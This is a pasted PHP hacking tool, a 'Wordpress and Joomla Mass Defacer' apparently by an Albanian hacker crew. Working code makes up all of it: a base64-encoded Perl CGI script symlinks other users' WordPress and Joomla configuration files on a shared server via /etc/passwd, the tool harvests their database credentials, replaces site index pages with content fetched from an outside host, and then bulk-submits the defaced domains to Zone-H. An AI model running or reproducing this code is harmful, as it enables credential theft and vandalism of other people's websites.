  587. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  588. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  589. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  590. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  591. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  592. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  593. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
  594. mkdir('plsym',0777);
  595. file_put_contents('plsym/data.txt', $_POST['man_data']);
  596. file_put_contents('plsym/plsym.cc', base64_decode($dt));
  597. chmod('plsym/plsym.cc', 0755);
  598. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
  599. $fp = @fopen ('plsym/.htaccess','w');
  600. fwrite($fp, $wr);
  601. fclose($fp);
  602. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
  603.  
  604. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
  605. unlink('plsym/plsym.cc');
  606. $data = file_get_contents($url);
  607. preg_match_all('/<a href="(.+)">/', $data, $match);
  608. unset($match[1][0]);
  609. $i=1;
  610. foreach($match[1] as $m)
  611. {
  612. $mz = explode('##',urldecode($m));
  613. $config01 = '';
  614. $config02 = '';
  615. if($mz[1] == 'joomla.txt') {
  616. $config01 = file_get_contents($url.$m);
  617. }
  618. if($mz[1] == 'wordpress.txt') {
  619. $config02 = file_get_contents($url.$m);
  620. }
  621. $domain = $map[$mz[0]];
  622. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  623.  
  624. if($config01 && preg_match('/dbprefix/i',$config01)){
  625. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  626. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
  627. $res = index_changer_joomla($config01, $def, $domain);
  628. echo '<td>'.$res['output'].'</td>';
  629. if($res['cond']) {
  630. echo '<td align="center"><span class="green">DEFACED</span></td>';
  631. fwrite($output, 'http://'.$domain."<br>");
  632. $count1++;
  633. } else {
  634. echo '<td align="center"><span class="red">FAILED</span></td>';
  635. }
  636. echo '</tr>';
  637. }
  638.  
  639. if($config02 && preg_match('/DB_NAME/i',$config02)){
  640. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
  641. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
  642. $res = index_changer_wp($config02, $def);
  643. echo '<td>'.$res['output'].'</td>';
  644. if($res['cond']) {
  645. echo '<td align="center"><span class="green">DEFACED</span></td>';
  646. fwrite($output, 'http://'.$domain."<br>");
  647. $count2++;
  648. } else {
  649. echo '<td align="center"><span class="red">FAILED</span></td>';
  650. }
  651. echo '</tr>';
  652. }
  653. }
  654. echo '</table>';
  655. echo '<hr/>';
  656. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
  657. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
  658. if($count1+$count2 > 0){
  659. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
  660. }
  661. }
  662.  
  663. function submit_zone_h() {
  664. $items = explode("<br>", trim(str_replace("\n",'',file_get_contents('defaced.html'))));
  665. unset($items[sizeof($items)-1]);
  666. $items = array_unique(str_replace('http://','',$items));
  667. $total = count($items);
  668.  
  669. echo '<h3 style="text-align: center;">Checking Defaced sites</h3>';
  670. echo "Total unique domain: $total<br /><br />";
  671. echo '<table style="width:50%;">';
  672. echo '<tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>DID</th><th>Domain</th><th>Status</th></tr>';
  673. $j = 1;
  674. $dc = 0;
  675. $sites = array();
  676. $prob_s = array();
  677. foreach($items as $s) {
  678. $data = file_get_contents('http://'.$s);
  679. $cond = strpos($data, '3xp1r3');
  680. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
  681. if($cond !== false){
  682. echo '<tr '.$cls.'><td>'.$j.'</td><td>'.($dc+1).'</td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="green">DEFACED</span></td></tr>';
  683. $sites[] = $s;
  684. $dc++;
  685. } else {
  686. echo '<tr '.$cls.'><td>'.$j.'</td><td>&nbsp;</td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="red">NOT DEFACED</span></td></tr>';
  687. $prob_s[] = $s;
  688. }
  689. $j++;
  690. }
  691. echo '</table><br />';
  692. file_put_contents('org_def.html','http://'.implode('<br/>http://',$sites));
  693. file_put_contents('fail_def.html','http://'.implode('<br/>http://',$prob_s));
  694. $total = $dc;
  695. echo '<h3 style="text-align: center;">Total Defaced = '.$total.'</h3>';
  696. echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a>&nbsp;|&nbsp;<a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
  697. echo '<h3 style="text-align: center;">Submitting to Zone-H</h3>';
  698. echo '<table style="width:50%;">';
  699. $main=curl_multi_init();
  700. $pause=10;
  701.  
  702. for($m=0;$m<3;$m++) { $http[] = curl_init(); }
  703.  
  704. for($n=0;$n<$total;$n +=30) {
  705. for($x=0;$x<30;$x++) {
  706. if($sites[$n+$x]!='') {
  707. echo'<tr class="even"><td>'.rtrim($sites[$n+$x]).'</td><td>DONE!!!</td></tr>';
  708. }
  709. }
  710. $d=$n+30;
  711. if($d>$total){$d=$total;}
  712. echo '<tr class="odd"><td colspan="2" style="text-align:center;">'.$d.' of '.$total.' Done</td></tr>';
  713.  
  714. for($w=0;$w<3;$w++) {
  715. $p=$w * 10;
  716. if(!(isset($sites[$n+$p]))){$pause=$w;break;}
  717. $posts[$w]="defacer=AHS-CREWdomain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=14&reason=5&submit=Send";
  718. $curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_POST => true, CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);
  719. curl_setopt_array($http[$w],$curlopt);
  720. curl_multi_add_handle($main,$http[$w]);
  721. }
  722.  
  723. $running = null;
  724. do{
  725. curl_multi_exec($main,$running);
  726. } while($running > 0);
  727.  
  728. for($m=0;$m<3;$m++) {
  729. if($pause==$m){break;}
  730. curl_multi_remove_handle($main, $http[$m]);
  731. $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
  732. if ($code != 200) {
  733. while(true){
  734. echo'<tr class="odd"><td colspan="2" style="text-align:center;">Server Error Retrying...</td></tr>';
  735. sleep(5);
  736. curl_exec($http[$m]);
  737. $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
  738. if( $code== 200){break 1;}
  739. }
  740. }
  741. }
  742. }
  743. echo '<tr class="odd"><td colspan="2" style="text-align:center;">Finished!!</td></tr></table>';
  744. echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a>&nbsp;|&nbsp;<a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
  745. curl_multi_close($main);
  746. }
  747.  
  748. function deleteDir($path) {
  749. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  750. $dh = opendir($path);
  751. while(($item = readdir($dh))!==false) {
  752. $item = $path.$item;
  753. if((basename($item) == "..") || (basename($item) == ".")) continue;
  754. $type = filetype($item);
  755. if ($type == "dir")
  756. deleteDir($item);
  757. else
  758. @unlink($item);
  759. }
  760. closedir($dh);
  761. @rmdir($path);
  762. }
  763.  
  764. function kill_me() {
  765. global $base_path;
  766. deleteDir($base_path.'sym');
  767. unlink($base_path.'defaced.html');
  768. unlink($base_path.'org_def.html');
  769. unlink($base_path.'fail_def.html');
  770. echo '<h1 style="text-align:center">All File Deleted</h1>';
  771. exit;
  772. }
  773.  
  774. echo '<!DOCTYPE html>
  775. <html>
  776. <head>
  777. <title>Joomla ~ Wordpress Mass Defacer</title>
  778. <style type="text/css">
  779. body {color: white; background: #000 url(http://sphotos-f.ak.fbcdn.net/hphotos-ak-prn1/65176_115131175320548_863165804_n.jpg) no-repeat 50% 50%;font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
  780. .header {position:fixed;width:100%;top:0;background:#000;}
  781. .footer {position:fixed;width:100%;bottom:0;background:#000;}
  782. input[type="submit"]{background-color:rgba(25,25,25,0.6);font-size: 45px;font-weight:bold;color: red;font-family: Tahoma; border: 1px solid #666666;height:100px;width:250px;}
  783. input[type="submit"]:hover{color:SeaShell;}
  784. input[type="radio"]{margin-top: 0;}
  785. .even {background-color: rgba(25, 25, 25, 0.6);}
  786. .odd {background-color: rgba(102, 102, 102, 0.6);}
  787. a {color:#fff;} a:hover {color:#00BFFF;}
  788. fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
  789. textarea{background: rgba(0,0,0,0.6); color: white;}
  790. .green {color:#00FF00;font-weight:bold;}
  791. .red {color:#FF0000;font-weight:bold;}
  792. .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
  793. </style>
  794. <script type="text/javascript">
  795. function change() {
  796. if(document.getElementById(\'rcd\').checked == true) {
  797. document.getElementById(\'tra\').style.display = \'\';
  798. } else {
  799. document.getElementById(\'tra\').style.display = \'none\';
  800. }
  801. }
  802. function hide() {
  803. document.getElementById(\'tra\').style.display = \'none\';
  804. }
  805. </script>
  806. </head>
  807. <body>
  808. <div class="header">
  809. <h1 style="font-family: cursive;text-align: center;"></h1>
  810. <a class="killme" href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&kill=1">Delete All Files</a>
  811. </div>
  812. <div class="footer">
  813. <h3 style="text-align: center;">&copy; Albanian Hackers Security.</h3>
  814. </div>
  815. <div style="background: rgba(0,0,0,0.5);padding:90px 0 65px 0;">
  816. <h2 style="color:green;text-align: center;">/Wordpress and Joomla Mass Defacer\</h2>';
  817. if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
  818. echo '<div align="center">
  819. <form action="" method="post">
  820. <fieldset>
  821. <table>
  822. <tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>PHP based whole server symlink and using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
  823. <tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>PERL based direct symlink and using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
  824. <tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>PERL based manual symlink with manual copy of /etc/passwd</td></tr>
  825. <tr><td></td><td><center>Created by d00mAHS</center></td></tr>
  826. <tr><td></td><td><center>Credits to : 3CA</center></td></tr>
  827. <tr><td></td><td><center>facebook.com/r00t.aHs</center></td></tr>
  828. <tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
  829. </table>
  830. </fieldset>
  831. <br />
  832. <input type="hidden" name="form_action" value="1">
  833. <input class=submit type="submit" value="m4ss!" name="Submit">
  834. </form>
  835. </div>';
  836. }
  837. echo '<div align="center">';
  838. if($_POST['form_action'] == 1) {
  839. if($_POST['mode']==1) { exec_mode_1('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  840. if($_POST['mode']==2) { exec_mode_2('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  841. if($_POST['mode']==3) { exec_mode_3('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  842. }
  843. if(isset($_GET['zh']) && $_GET['zh']==1) { submit_zone_h(); }
  844. if($_GET['mode']==1) { exec_mode_1('http://balarama108.com/wp-content/themes/twentyten/index.txt'); }
  845. if(isset($_GET['kill']) && $_GET['kill']==1) { kill_me(); }
  846. echo '</div>
  847. </div>
  848. </body>
  849. </html>';
  850. }
RAW Paste Data